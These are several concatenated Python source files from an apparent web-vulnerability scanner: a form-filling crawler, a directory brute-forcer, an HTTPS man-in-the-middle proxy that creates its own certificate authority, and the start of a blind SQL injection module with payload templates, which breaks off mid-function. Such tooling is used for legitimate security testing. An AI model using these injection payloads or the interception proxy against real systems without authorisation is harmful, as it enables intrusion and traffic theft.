import logging
import requests
from bs4 import BeautifulSoup
from concurrent.futures import ThreadPoolExecutor
import time
import json
import random
import re
import string
import hashlib
import os
import sys

from helios.core.engine import CookieLib
from helios.core.utils import params_from_str

try:
    import urlparse
    from Queue import Queue, Empty
except ImportError:
    import urllib.parse as urlparse
    from queue import Queue, Empty


# Main Crawler module, uses BeautifulSoup4 to extract url / form data

class Crawler:
    # checksum, array of possible values
    postdata = []
    max_allowed_checksum = 5

    max_urls = 200
    max_url_unique_keys = 5
    url_variations = []
    ignored = []

    max_postdata_per_url = 10
    max_postdata_unique_keys = 5
    blocked_filetypes = ['.jpg', '.png', '.gif', '.wav', '.mp3', '.mp4', '.3gp', '.js', '.css', '.jpeg', '.pdf', '.ico',
                         '.tiff', '.svg', '.doc', '.docx', '.xls', '.xlsx', '.woff', '.woff2', '.ttf', '.eot', '.ttf']
    output_filename = "tmp.json"
    thread_count = 5
    cookie = CookieLib()
    is_debug = True
    logger = None
    headers = {}
    data_dir = "data"
    page_re = [
        re.compile(r'window\.location\s*=\s*[\'"](.+?)[\'"]'),
        re.compile(r'document\.location\s*=\s*[\'"](.+?)[\'"]'),
        re.compile(r'document\.location\.href\s*=\s*[\'"](.+?)[\'"]'),
        re.compile(r'window\.location\.replace\([\'"](.+?)[\'"]'),
        re.compile(r'http-equiv="refresh.+?URL=[\'"](.+?)[\'"]')
    ]
    write_output = True
    scope = None
    base_url = None
    login = None

    def __init__(self, base_url, agent=None, logger=logging.INFO, scope=None):
        self.base_url = base_url
        self.root_url = '{}://{}'.format(urlparse.urlparse(self.base_url).scheme, urlparse.urlparse(self.base_url).netloc)
        self.pool = ThreadPoolExecutor(max_workers=self.thread_count)
        self.scraped_pages = []
        self.to_crawl = Queue()
        self.to_crawl.put([self.base_url, None])
        self.output_filename = os.path.join(self.data_dir, 'crawler_%s_%d.json' % (urlparse.urlparse(self.base_url).netloc, time.time()))
        self.logger = logging.getLogger("Crawler")
        self.logger.setLevel(logger)
        ch = logging.StreamHandler(sys.stdout)
        ch.setLevel(logger)
        formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
        ch.setFormatter(formatter)
        if not self.logger.handlers:
            self.logger.addHandler(ch)
        self.logger.debug("Starting Crawler")
        if agent:
            self.headers['User-Agent'] = agent
            self.logger.debug("Using User-Agent %s for crawling" % agent)
        if not os.path.exists(self.data_dir):
            self.logger.info("Data directory %s does not exist, creating" % self.data_dir)
            os.mkdir(self.data_dir)
        self.scope = scope

    def get_filetype(self, url):
        url = url.split('?')[0]
        loc = urlparse.urlparse(url).path.split('.')
        if len(loc) is 1:
            return None
        return ".{0}".format(loc[len(loc)-1].lower())

    def parse_url(self, url, rooturl):
        url = url.split('#')[0]
        url = url.strip()
        if url in self.ignored:
            return
        if self.get_filetype(url) in self.blocked_filetypes:
            self.ignored.append(url)
            self.logger.debug("Url %s will be ignored because file type is not allowed" % url)
            return
        if "?" in url:
            params = params_from_str(url.split('?')[1])
            checksum = FormDataToolkit.get_checksum(params)
            if [url, checksum] in self.url_variations:
                var_num = 0
                for part in self.url_variations:
                    if part == [url, checksum]:
                        var_num += 1
                if var_num >= self.max_url_unique_keys:
                    self.ignored.append(url)
                    self.logger.debug("Url %s will be ignored because key variation limit is exceeded" % url)
                    return
                self.url_variations.append([url, checksum])
        if self.login and 'logout' in url.lower():
            self.ignored.append(url)
            self.logger.debug("Url %s will be ignored because login is active" % url)
            return

        if 'manual/' in url.lower():
            self.ignored.append(url)
            return

        # if local link or link on same site root
        if url.startswith('/') or url.startswith(self.root_url):
            url = urlparse.urljoin(rooturl, url)
            if [url, None] not in self.scraped_pages:
                self.to_crawl.put([url, None])
        # javascript, raw data, mailto etc..
        if not url.startswith('javascript:') or url.startswith('data:') or url.startswith('mailto:'):
            url = urlparse.urljoin(rooturl, url)
            if not self.scope.in_scope(url):
                self.ignored.append(url)
                self.logger.debug("Url %s will be ignored because out of scope" % url)
                return
            if [url, None] not in self.scraped_pages:
                self.to_crawl.put([url, None])

    def parse_links(self, html, rooturl):
        try:
            soup = BeautifulSoup(html, 'html.parser')
            links = soup.find_all('a', href=True)
            for link in links:
                if (self.to_crawl.qsize() + len(self.scraped_pages)) > self.max_urls:
                    continue
                url = link['href']
                self.parse_url(url, rooturl)
            for regex in self.page_re:
                results = regex.findall(html)
                for res in results:
                    self.parse_url(res, rooturl)

        except Exception as e:
            self.logger.warning("Parse error on %s -> %s" % (rooturl, str(e)))

    def get_col(self, arr, col):
        return map(lambda x: x[col], arr)

    def scrape_info(self, html, rooturl):
        e = Extractor(html, rooturl)
        forms = e.extract(fill_empty=True)
        for f in forms:
            url, data = f
            checksum = FormDataToolkit.get_checksum(data)
            if checksum not in self.get_col(self.postdata, 0):
                if [url, data] not in self.scraped_pages:
                    if not self.scope.in_scope(url):
                        self.ignored.append(url)
                        self.logger.debug("Url %s will be ignored because out of scope" % url)
                        continue
                    self.to_crawl.put([url, data])
                self.postdata.append([checksum, url, data])

    def post_scrape_callback(self, res):
        result = res.result()
        if result:
            if result.status_code == 200:
                self.parse_links(result.text, result.url)
                self.scrape_info(result.text, result.url)
                try:
                    self.cookie.autoparse(result.headers)
                except Exception as e:
                    self.logger.warning("Error processing page cookies: %s" % str(e))
            if str(result.status_code).startswith('3'):
                if 'Location' in result.headers:
                    self.parse_url(result.headers['Location'], result.url)

    def scrape_page(self, url):
        url, data = url
        try:
            if data:
                return requests.post(url, data, cookies=self.cookie.cookies,
                                     allow_redirects=False, headers=self.headers,  timeout=(3, 30), verify=False)
            return requests.get(url, timeout=(3, 30), cookies=self.cookie.cookies,
                                allow_redirects=False, headers=self.headers, verify=False)
        except requests.RequestException:
            return
        except Exception as e:
            self.logger.warning("Error in thread: %s" % str(e))
            return

    def has_page(self, url, data):
        for u, d in self.scraped_pages:
            if url == u and data == d:
                return True
        return False

    def run_scraper(self):
        emptyrun = 0
        while True:
            try:
                target_url = self.to_crawl.get(timeout=10)
                if not self.has_page(target_url[0], target_url[1]):
                    self.logger.info("Scraping URL: {}".format(target_url))
                    self.scraped_pages.append([target_url[0], target_url[1]])
                    job = self.pool.submit(self.scrape_page, target_url)
                    job.add_done_callback(self.post_scrape_callback)
                    emptyrun += 1
            except Empty:
                break
            except Exception as e:
                self.logger.warning("Error: %s" % str(e))
                continue
            self.logger.debug("Todo: {0} Done: {1}".format(self.to_crawl.qsize(), len(self.scraped_pages)))
        if self.write_output:
            output = json.dumps(self.scraped_pages)
            with open(self.output_filename, 'w') as f:
                f.write(output)


# class with some static methods
class FormDataToolkit:
    def __init__(self):
        pass

    @staticmethod
    def get_checksum(data):
        keys = []
        for x in data:
            keys.append(x)
        return hashlib.md5(''.join(keys).encode('utf-8')).hexdigest()

    @staticmethod
    def get_full_checksum(data):
        keys = []
        for x in data:
            keys.append("{0}={1}".format(x, data[x]))
        return hashlib.md5('&'.join(keys).encode('utf-8')).hexdigest()


# class for fast dir/file discovery using word list
class WebFinder:
    logger = None
    pool = Queue(maxsize=0)
    executor = None
    ok_status_codes = [200, 204, 301, 302, 307, 401, 403, 500]
    output = []
    errors = 0
    can_use_head = False
    invalid_text = None
    thread_count = 20
    cookies = {}
    headers = {}

    def __init__(self, url, logger, word_list=None, append=None, ok_status_codes=None, invalid_text=None, threads=20):
        self.logger = logging.getLogger("WebFinder")
        self.logger.setLevel(logger)
        ch = logging.StreamHandler(sys.stdout)
        ch.setLevel(logger)
        formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
        ch.setFormatter(formatter)
        if not self.logger.handlers:
            self.logger.addHandler(ch)
        if not word_list:
            self.logger.info("No custom wordlist supplied, using seclists common one")
            cdir = os.path.abspath(os.path.dirname(__file__))
            word_list = os.path.join(cdir, "../wordlists/common.txt")
        if not os.path.exists(word_list):
            self.logger.error("Wordlist file %s could not be opened!" % word_list)
            return

        self.thread_count = threads

        with open(word_list, 'r') as input_file:
            for line in input_file.readlines():
                line = line.strip()
                self.pool.put(urlparse.urljoin(url, line))
                if append:
                    for ext in append.split(','):
                        ext = ext.strip()
                        if ext.startswith('.'):
                            ext = ext[1:]
                        self.pool.put(urlparse.urljoin(url, "%s.%s" % (line, ext)))
        self.logger.info("Queued %d items for file / directory discovery" % (self.pool.qsize()))
        if ok_status_codes:
            self.ok_status_codes = [int(x.strip()) for x in ok_status_codes.split(',')]

        if invalid_text:
            self.can_use_head = False
            self.invalid_text = invalid_text
        else:
            if self.detect_head(url):
                self.logger.debug("HEAD method appears to be usable")
            else:
                self.logger.debug("HEAD method does not appears to be usable")
            if self.detect_wildcard(url):
                self.logger.info("You can supply a 404 text pattern with the --wordlist-404 argument")
                return

        self.run()

    def run(self):
        with ThreadPoolExecutor(max_workers=self.thread_count) as executor:
            while 1:
                if self.errors > 40:
                    self.logger.error("Giving up because of timeout errors!")
                    self.pool.empty()
                    return

                if self.errors > 20:
                    self.logger.warning("Too many timeouts, waiting 60 seconds")
                    time.sleep(60)

                try:
                    url = self.pool.get(timeout=60)
                    job = executor.submit(self.check, url)
                    job.add_done_callback(self.result_callback)
                except Empty:
                    self.logger.debug("Run done, waiting for threads to finish")
                    time.sleep(5)
                    break
                except KeyboardInterrupt:
                    self.pool.empty()
                    break

    def result_callback(self, response):
        result = response.result()
        if result is False:
            return
        self.errors = 0
        if self.invalid_text and self.invalid_text not in result.text:
            self.output.append(result.url)
            self.logger.info("Discovered: %s [%d]" % (result.url, result.status_code))
        if result.status_code in self.ok_status_codes:
            self.output.append(result.url)
            self.logger.info("Discovered: %s [%d]" % (result.url, result.status_code))

    def detect_wildcard(self, url):
        try:
            rand_str = ''.join(random.choice(string.ascii_lowercase + string.ascii_uppercase) for _ in range(15))
            invalid_url = urlparse.urljoin(url, rand_str)
            res = requests.get(url=invalid_url, allow_redirects=False)
            if res.status_code in self.ok_status_codes:
                self.logger.warning("Response code wildcard. detected %d on URL: %s" % (res.status_code, invalid_url))
                return True
        except Exception as e:
            pass
        return False

    def detect_head(self, url):
        try:
            res = requests.head(url=url, allow_redirects=False)
            if res.status_code != 405:
                self.can_use_head = True
                return True
        except Exception as e:
            self.logger.warning("Error detecting HEAD on URL %s: %s" % (url, str(e)))
            pass
        return False

    def check(self, url):
        try:
            if self.can_use_head:
                return requests.head(url, allow_redirects=False, headers=self.headers, cookies=self.cookies)
            else:
                return requests.get(url, allow_redirects=False, headers=self.headers, cookies=self.cookies)

        except requests.exceptions.ConnectTimeout:
            self.errors += 1
            self.pool.put(url)
            return False
        except requests.exceptions.ReadTimeout:
            self.errors += 1
            self.pool.put(url)
            return False
        except Exception as e:
            self.logger.warning("Warning: URLS %s causes exception: %s" % (url, str(e)))
            return False


# the Extractor class is used to extract forms from HTML
# the default extract() method is equipped with the functionality to automatically fill in input fields
class Extractor:
    body = None
    url = None
    random_text_size = 8
    user_email = None
    user_password = None

    def __init__(self, text, original_url = ""):
        soup = BeautifulSoup(text, 'html.parser')
        self.body = soup
        self.url = original_url

    def extract(self, fill_empty=False):
        rtn = []
        for form in self.get_forms():
            action = self.get_action(form)
            inputs = self.get_inputs(form)
            special = self.get_special(form, fill_empty)
            data = self.get_form_parameters(inputs, fill_empty)
            for item in special:
                data[item] = special[item]
            rtn.append([urlparse.urljoin(self.url, action), data])
        return rtn

    def get_special(self, form, fill_empty=False):
        results = {}
        inputs = form.find_all('textarea', {'name': True})
        for i in inputs:
            name = i['name']
            if i.text and len(i.text.strip()):
                results[name] = i.text
            else:
                if fill_empty:
                    value = self.generate_random(None, None)
                    results[name] = value
                else:
                    results[name] = ""

        inputs = form.find_all('select', {'name': True})
        for i in inputs:
            name = i['name']
            options = i.find_all('option', {'value': True})
            if len(options):
                results[name] = options[0]['value']
            else:
                if fill_empty:
                    value = self.generate_random(None, None)
                    results[name] = value
                else:
                    results[name] = ""
        return results

    def get_form_parameters(self, inputs, fill_empty):
        res = {}
        for inp in inputs:
            try:
                name = inp['name']
                input_type = inp['type'] if 'type' in inp.attrs else None

                value = None
                if 'value' in inp.attrs and len(inp['value']) > 0:
                    value = inp['value']
                elif fill_empty and input_type != "hidden":
                    value = self.generate_random(input_type, name)
                else:
                    value = ""
                if name not in res:
                    res[name] = value
            except Exception as e:
                pass
        return res

    def generate_random(self, input_type, name):
        # in some cases this allows the crawler to successfully register + login
        if not input_type:
            return ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(self.random_text_size))
        if input_type == "email" or "mail" in name:
            if not self.user_email:
                self.user_email = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(self.random_text_size)) + '@' + ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(self.random_text_size)) + '.com'
            return self.user_email
        if input_type == "password" or "password" in name:
            if not self.user_password:
                self.user_password = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(self.random_text_size))
            return self.user_password

        if input_type in ['number', 'integer', 'decimal']:
            return 1
        return ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(self.random_text_size))

    def get_inputs(self, form):
        inputs = form.find_all('input', {'name': True})
        return inputs

    def get_action(self, form):
        if 'action' not in form.attrs:
            return self.url
        return urlparse.urljoin(self.url, form['action'])

    def get_forms(self):
        forms = []
        try:
            forms = self.body.find_all('form')
        except:
            return forms
        return forms



try:
    from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
    from urlparse import urlparse, urlunparse, ParseResult
    from SocketServer import ThreadingMixIn
    from httplib import HTTPResponse
except ImportError:
    # Python3 imports
    from http.server import BaseHTTPRequestHandler, HTTPServer
    from socketserver import ThreadingMixIn
    from urllib.parse import urlparse, urlunparse, ParseResult
    from http.client import HTTPResponse

# https://github.com/stefan2200/pymiproxy
from tempfile import gettempdir
from os import path, listdir
from ssl import wrap_socket
from socket import socket
from re import compile
from sys import argv
try:
    from OpenSSL.crypto import (X509Extension, X509, dump_privatekey, dump_certificate, load_certificate,
                                load_privatekey, PKey, TYPE_RSA, X509Req)
    from OpenSSL.SSL import FILETYPE_PEM
except Exception as e:
    print("Error loading OpenSSL modules for HTTPS proxy, the Mefjus module might not be usable: %s" % str(e))



class CertificateAuthority(object):

    def __init__(self, ca_file='ca.pem', cache_dir=gettempdir()):
        self.ca_file = ca_file
        self.cache_dir = cache_dir
        self._serial = self._get_serial()
        if not path.exists(ca_file):
            self._generate_ca()
        else:
            self._read_ca(ca_file)

    def _get_serial(self):
        s = 1
        for c in filter(lambda x: x.startswith('.pymp_'), listdir(self.cache_dir)):
            c = load_certificate(FILETYPE_PEM, open(path.sep.join([self.cache_dir, c])).read())
            sc = c.get_serial_number()
            if sc > s:
                s = sc
            del c
        return s

    def _generate_ca(self):
        # Generate key
        self.key = PKey()
        self.key.generate_key(TYPE_RSA, 2048)

        # Generate certificate
        self.cert = X509()
        self.cert.set_version(3)
        self.cert.set_serial_number(1)
        self.cert.get_subject().CN = 'ca.mitm.com'
        self.cert.gmtime_adj_notBefore(0)
        self.cert.gmtime_adj_notAfter(315360000)
        self.cert.set_issuer(self.cert.get_subject())
        self.cert.set_pubkey(self.key)

        self.cert.add_extensions([
            X509Extension(b"basicConstraints", True, b"CA:TRUE, pathlen:0"),
            X509Extension(b"keyUsage", True, b"keyCertSign, cRLSign"),
            X509Extension(b"subjectKeyIdentifier", False, b"hash", subject=self.cert),
            ])
        self.cert.sign(self.key, "sha1")

        with open(self.ca_file, 'wb+') as f:
            f.write(dump_privatekey(FILETYPE_PEM, self.key))
            f.write(dump_certificate(FILETYPE_PEM, self.cert))

    def _read_ca(self, file):
        self.cert = load_certificate(FILETYPE_PEM, open(file, "rb").read())
        self.key = load_privatekey(FILETYPE_PEM, open(file, "rb").read())

    def __getitem__(self, cn):
        cnp = path.sep.join([self.cache_dir, '.pymp_%s.pem' % cn])
        if not path.exists(cnp):
            # create certificate
            key = PKey()
            key.generate_key(TYPE_RSA, 2048)

            # Generate CSR
            req = X509Req()
            req.get_subject().CN = cn
            req.set_pubkey(key)
            req.sign(key, 'sha1')

            # Sign CSR
            cert = X509()
            cert.set_subject(req.get_subject())
            cert.set_serial_number(self.serial)
            cert.gmtime_adj_notBefore(0)
            cert.gmtime_adj_notAfter(31536000)
            cert.set_issuer(self.cert.get_subject())
            cert.set_pubkey(req.get_pubkey())
            cert.sign(self.key, 'sha1')

            with open(cnp, 'wb+') as f:
                f.write(dump_privatekey(FILETYPE_PEM, key))
                f.write(dump_certificate(FILETYPE_PEM, cert))

        return cnp

    @property
    def serial(self):
        self._serial += 1
        return self._serial


class UnsupportedSchemeException(Exception):
    pass


class ProxyHandler(BaseHTTPRequestHandler):

    r = compile(r'http://[^/]+(/?.*)(?i)')

    def __init__(self, request, client_address, server):
        self.is_connect = False
        self._headers_buffer = []
        BaseHTTPRequestHandler.__init__(self, request, client_address, server)

    def _connect_to_host(self):
        # Get hostname and port to connect to
        if self.is_connect:
            self.hostname, self.port = self.path.split(':')
        else:
            u = urlparse(self.path)
            if u.scheme != 'http':
                raise UnsupportedSchemeException('Unknown scheme %s' % repr(u.scheme))
            self.hostname = u.hostname
            self.port = u.port or 80
            self.path = urlunparse(
                ParseResult(
                    scheme='',
                    netloc='',
                    params=u.params,
                    path=u.path or '/',
                    query=u.query,
                    fragment=u.fragment
                )
            )

        # Connect to destination
        self._proxy_sock = socket()
        self._proxy_sock.settimeout(10)
        self._proxy_sock.connect((self.hostname, int(self.port)))

        # Wrap socket if SSL is required
        if self.is_connect:
            self._proxy_sock = wrap_socket(self._proxy_sock)

    def _transition_to_ssl(self):
        self.request = wrap_socket(self.request, server_side=True, certfile=self.server.ca[self.path.split(':')[0]])

    def do_CONNECT(self):
        self.is_connect = True
        try:
            # Connect to destination first
            self._connect_to_host()
            # If successful, let's do this!
            self.send_response(200, "connection established")
            self.end_headers()
            #self.request.sendall('%s 200 Connection established\r\n\r\n' % self.request_version)
            self._transition_to_ssl()
        except Exception as e:
            self.send_error(500, str(e))
            return

        # Reload!
        self.setup()
        self.ssl_host = 'https://%s' % self.path
        self.handle_one_request()

    def do_COMMAND(self):

        # Is this an SSL tunnel?
        if not self.is_connect:
            try:
                # Connect to destination
                self._connect_to_host()
            except Exception as e:
                self.send_error(500, str(e))
                return
            # Extract path

        # Build request
        req = '%s %s %s\r\n' % (self.command, self.path, self.request_version)
        # Add headers to the request
        for h in self.headers:
            if h.lower() == "accept-encoding":
                req += '%s:identity\r\n' % h
            else:
                req += '%s:%s\r\n' % (h, self.headers[h])

        # Append message body if present to the request
        if 'Content-Length' in self.headers:
            req += "\r\n"
            req += self.rfile.read(int(self.headers['Content-Length'])).decode()

        # Send it down the pipe!
        proxyreq = self.mitm_request(req).encode()
        if not proxyreq.endswith(b'\r\n\r\n\r\n'):
            if not proxyreq.endswith(b'\r\n'):
                proxyreq = proxyreq + b"\r\n\r\n\r\n"
            else:
                proxyreq = proxyreq + b"\r\n\r\n"
        self._proxy_sock.sendall(proxyreq)

        # Parse response
        h = HTTPResponse(self._proxy_sock)
        h.begin()

        # Get rid of the pesky header
        del h.msg['Transfer-Encoding']

        # Time to relay the message across
        res = '%s %s %s\r\n' % (self.request_version, h.status, h.reason)
        res += '%s\r\n' % h.msg
        body = h.read()
        res += body.decode(encoding="utf-8", errors="ignore")

        # Let's close off the remote end
        h.close()
        self._proxy_sock.close()

        # Relay the message
        relay = self.mitm_response(res).encode("utf-8")
        self.request.sendall(relay)

    def mitm_request(self, data):
        for p in self.server._req_plugins:
            data = p(self.server, self).do_request(data)
        return data

    def mitm_response(self, data):
        for p in self.server._res_plugins:
            data = p(self.server, self).do_response(data)
        return data

    def __getattr__(self, item):
        if item.startswith('do_'):
            return self.do_COMMAND


class InterceptorPlugin(object):

    def __init__(self, server, msg):
        self.server = server
        self.message = msg


class RequestInterceptorPlugin(InterceptorPlugin):

    def do_request(self, data):
        return data


class ResponseInterceptorPlugin(InterceptorPlugin):

    def do_response(self, data):
        return data


class InvalidInterceptorPluginException(Exception):
    pass


class MitmProxy(HTTPServer):

    def __init__(self, server_address=('', 8080), RequestHandlerClass=ProxyHandler, bind_and_activate=True, ca_file='ca.pem'):
        HTTPServer.__init__(self, server_address, RequestHandlerClass, bind_and_activate)
        self.ca = CertificateAuthority(ca_file)
        self._res_plugins = []
        self._req_plugins = []

    def register_interceptor(self, interceptor_class):
        if not issubclass(interceptor_class, InterceptorPlugin):
            raise InvalidInterceptorPluginException('Expected type InterceptorPlugin got %s instead' % type(interceptor_class))
        if issubclass(interceptor_class, RequestInterceptorPlugin):
            self._req_plugins.append(interceptor_class)
        if issubclass(interceptor_class, ResponseInterceptorPlugin):
            self._res_plugins.append(interceptor_class)


class AsyncMitmProxy(ThreadingMixIn, MitmProxy):
    pass


class MitmProxyHandler(ProxyHandler):

    def mitm_request(self, data):
        print('>> %s' % repr(data[:100]))
        return data

    def mitm_response(self, data):
        print('<< %s' % repr(data[:100]))
        return data


class DebugInterceptor(RequestInterceptorPlugin, ResponseInterceptorPlugin):

        def do_request(self, data):
            print('>> %s' % repr(data[:100]))
            return data

        def do_response(self, data):
            print('<< %s' % repr(data[:100]))
            return data


if __name__ == '__main__':
    proxy = None
    if not argv[1:]:
        proxy = AsyncMitmProxy()
    else:
        proxy = AsyncMitmProxy(ca_file=argv[1])
    proxy.register_interceptor(DebugInterceptor)
    try:
        proxy.serve_forever()
    except KeyboardInterrupt:
        proxy.server_close()



from helios.webapp import base_app
import re
import json

try:
    from urlparse import urljoin
except ImportError:
    from urllib.parse import urljoin


# This script detects vulnerabilities in the following PHP based products:
# - Typo 3
class Scanner(base_app.BaseAPP):

    def __init__(self):
        self.name = "PHP"
        self.types = []

    def detect(self, url):
        directories = ['']
        for d in directories:
            path = urljoin(url, d)
            response = self.send(path)
            if response:
                if 'Server' in response.headers and 'php' in response.headers['Server'].lower():
                    self.app_url = path
                    return True
                if 'X-Powered-By' in response.headers and 'php' in response.headers['Server'].lower():
                    self.app_url = path
                    return True
                if 'Server' in response.headers and 'apache' in response.headers['Server'].lower() \
                        and 'tomcat' not in response.headers['Server'].lower() \
                        and 'coyote' not in response.headers['Server'].lower():
                    self.app_url = path
                    return True
        return False

    def test(self, url):
        root_page = self.send(url)
        version = None
        if 'Server' in root_page.headers and 'php' in root_page.headers['Server'].lower():

            get_version = re.search(r'php/([\d\.]+)', root_page.headers['Server'], re.IGNORECASE)
            if get_version:
                version = get_version.group(1)
                self.logger.info("%s version %s was identified from the Server header tag" % (self.name, version))
        if not version:
            if 'X-Powered-By' in root_page.headers and 'php' in root_page.headers['X-Powered-By'].lower():
                get_version = re.search(r'php/([\d\.]+)', root_page.headers['X-Powered-By'], re.IGNORECASE)
                if get_version:
                    version = get_version.group(1)
                    self.logger.info("%s version %s was identified from the X-Powered-By header tag" %
                                     (self.name, version))

        if version:
            db = self.get_db("php_vulns.json")
            data = json.loads(db)
            vulns = data['PHP']
            self.match_versions(vulns, version, url)



import re
import fnmatch
from helios.core.utils import *
from helios.core.request import *
import copy
try:
    from urlparse import urljoin, urlparse
except ImportError:
    from urllib.parse import urljoin, urlparse


class Engine:
    script = {}


class CookieLib:
    cookiefile = None
    cookies = {

    }
    parsed = {}
    domain = None

    def __init__(self, cookiefile=None):
        self.cookiefile = cookiefile

    def set(self, string):
        string = string.replace('; ', ';')
        parts = string.split(';')
        p = parts[0]
        p = p.strip()
        cookie_key, cookie_value = p.split('=')
        secure = "Secure" in parts
        httponly = "HttpOnly" in parts
        self.parsed[cookie_key] = {
            "value": cookie_value,
            "is_secure": secure,
            "is_httponly": httponly
        }
        # if not cookie_key in self.cookies:
        #    print("[COOKIELIB] Cookie %s=%s was set" % (cookie_key, cookie_value))

        self.cookies[cookie_key] = cookie_value

    def append(self, cookieset):
        for key in cookieset:
            self.parsed[key] = {"value": cookieset[key], "is_secure": False, "is_httponly": True}
            self.cookies[key] = cookieset[key]

    def get(self):
        outstr = ""
        if len(self.cookies) == 0:
            return None
        for c in self.cookies:
            outstr += "%s=%s; " % (c, self.cookies[c]["value"])
        return outstr[:-2]

    def autoparse(self, headers):
        plain = multi_to_lower(headers)
        if 'set-cookie' in plain:
            self.set(plain['set-cookie'])


class MatchObject:
    is_ok = True
    match_type = ""
    match = ""
    match_location = ""  # body, headers, cookie
    options = []
    name = "Template, please set name"

    def __init__(self, mtype, match, location, name, options=[]):
        self.match_type = mtype
        self.match_location = location
        self.match = match
        self.options = options
        self.name = name
        self.test_regex()

    def test_regex(self):
        if self.match_type == "regex":
            try:
                re.compile(self.match)
            except Exception as e:
                print("Compilation of regex %s has failed, disabling script" % self.match)
                print("Error: %s" % str(e))
                self.is_ok = False

    def run(self, response_object):
        if not response_object:
            return False
        if self.match_location == "status_code":
            if self.match_type == "contains":
                if self.match in str(response_object.code):
                    return "(%s) status code: %s was found" % (self.name, self.match)
            if self.match_type == "equals":
                try:
                    if response_object.code == int(self.match):
                        return "(%s) status code: %s was found" % (self.name, self.match)
                except:
                    pass

        if self.match_location == "body":
            search = response_object.text
            if "ignore_case" in self.options:
                search = search.lower()

            if "ascii" in self.options:
                search = search.encode('ascii', 'ignore')

            if "utf-8" in self.options:
                search = search.encode('utf-8', 'ignore')

            if self.match_type == "contains":
                if self.match in search:
                    return "Match: %s was found" % self.match

            if self.match_type == "regex":
                r = re.compile(self.match)
                regresult = r.search(search) if "multi_line" not in self.options else r.search(search, re.MULTILINE)
                if regresult:
                    matches = ', '.join(regresult.groups()) if len(regresult.groups()) > 0 else None
                    if 'strip_newlines' in self.options and matches:
                        matches = matches.replace("\n", "")
                    return "Regex Match: %s was found %s" % (self.match, "match : %s" % matches if matches else '')

            if self.match_type == "fnmatch":
                if fnmatch.fnmatch(search, self.match):
                    return "fnmatch: %s was found" % self.match

        if self.match_location == "headers":
            headers = response_object.headers
            if "ignore_case" in self.options:
                headers = multi_to_lower(headers, also_values="ignore_case_values" in self.options)

            if self.match_type == "exists":
                if self.match in headers:
                    return "Header %s: %s exists" % (self.match, headers[self.match])

            if self.match_type.startswith('contains:'):
                key = self.match_type.replace('contains:', '')
                if key in headers:
                    if self.match in headers[key]:
                        return "Header %s: %s matches %s" % (key, headers[key], self.match)

            if self.match_type.startswith("regex:"):
                key = self.match_type.replace('regex:', '')
                if key in headers:
                    r = re.compile(self.match)
                    if r.search(headers[key]):
                        return "Regex Match: %s was found on header %s: %s" % (self.match, key, headers[key])
            return False


class CustomRequestBuilder:
    root_url = ""
    match = None
    url = ""
    data = None
    headers = {}
    options = []

    def __init__(self, url, data, headers={}, options=[]):
        self.url = url
        self.data = data
        self.headers = headers

    def run(self):
        newurl = ""
        if "rootdir" in self.options:
            data = urlparse(self.root_url)
            result = '{uri.scheme}://{uri.netloc}/'.format(uri=data)
            newurl = urljoin(result, self.url)
        else:
            newurl = urljoin(self.root_url, self.url)
        request = Request(
            url=newurl,
            data=self.data,
            headers=self.headers
        )
        request.run()
        if request.is_ok and request.is_done:
            return request
        return False


class RequestBuilder:
    initial_request = None
    itype = None
    value = None
    debug = False
    results = []
    name = ""

    def __init__(self, req, inject_type, inject_value, matchobject, name):
        self.initial_request = copy.copy(req)
        self.itype = inject_type
        self.value = inject_value
        self.m = matchobject
        self.value = self.value.replace('{null}', '\0')
        self.value = self.value.replace('{crlf}', '\r\n')
        self.name = name

    def execute(self, new_request):
        new_request.run()
        if new_request.is_done and new_request.is_ok:
            return new_request.response
        return None

    def test(self, response):
        if self.debug:
            print(response.to_string())
        for match in self.m:
            result = match.run(response)
            if result:
                return result
        return None

    def found(self, response, match):
        mobj = {"request": response_to_dict(response), "match": match}
        if mobj not in self.results:
            self.results.append(mobj)

    def run_on_parameters(self):
        original_url = self.initial_request.url
        if "?" in self.initial_request.url:
            url, parameters = self.initial_request.url.split('?')
            params = params_from_str(parameters)
            tmp = {}
            for p in params:
                tmp = dict(params)
                tmp[p] = self.value.replace('{value}', params[p])
                request = self.initial_request
                request.url = "%s?%s" % (url, params_to_str(tmp))
                response = self.execute(request)
                result = None
                result = self.test(response)
                if result:
                    self.found(response, result)
        if self.initial_request.data:
            data = self.initial_request.data
            if type(data) == str:
                data = params_from_str(data)
            tmp = {}
            for p in data:
                tmp = dict(data)
                if not data[p]:
                    data[p] = ""
                tmp[p] = self.value.replace('{value}', data[p])
                request = self.initial_request
                request.url = original_url
                request.data = tmp
                response = self.execute(request)
                result = self.test(response)
                if result:
                    self.found(response, result)

    def run(self):
        self.results = []
        if "parameters" in self.itype:
            self.run_on_parameters()
        return self.results



try:
    from urllib import quote_plus
except ImportError:
    from urllib.parse import quote_plus
import requests
import random
import helios.modules.module_base
from helios.core.utils import requests_response_to_dict, random_string


class Module(helios.modules.module_base.Base):
    def __init__(self):
        self.name = "Blind SQL Injection (Boolean Based)"
        self.active = True
        self.module_types = ['injection']
        self.possibilities = {
            'bool_int_and': "{original_value} AND ({query})",
            'bool_int_and_comment': "{original_value} AND ({query})--",
            'bool_int_or': "-1 OR ({query})",
            'bool_int_or_comment': "-1 OR ({query})--",
            'bool_int_and_group_comment': "{original_value}) AND ({query})--",
            'bool_str_and': "{original_value}' AND ({query}) OR 'a'='b",
            'bool_str_or': "invalid' OR ({query}) OR 'a'='b",
            'bool_str_and_comment': "{original_value}' AND ({query})--",
            'bool_str_or_comment': "invalid' OR ({query})--",
            'bool_str_and_group_comment': "{original_value}') AND ({query})--",
        }

        self.can_use_content_length = True
        self.is_stable = True
        self.severity = 3

        self.auto = True
        self.headers = {}
        self.cookies = {}
        self.input = "urldata"
        self.output = "vulns"
        self.aggressive = False

    def run(self, url, data={}, headers={}, cookies={}):
        if not self.active and 'passive' not in self.module_types:
            # cannot send requests and not configured to do passive analysis on data
            return
        base, param_data = self.get_params_from_url(url)
        self.cookies = cookies
        self.headers = headers
        results = []
        if not data:
            data = {}
        for param in param_data:
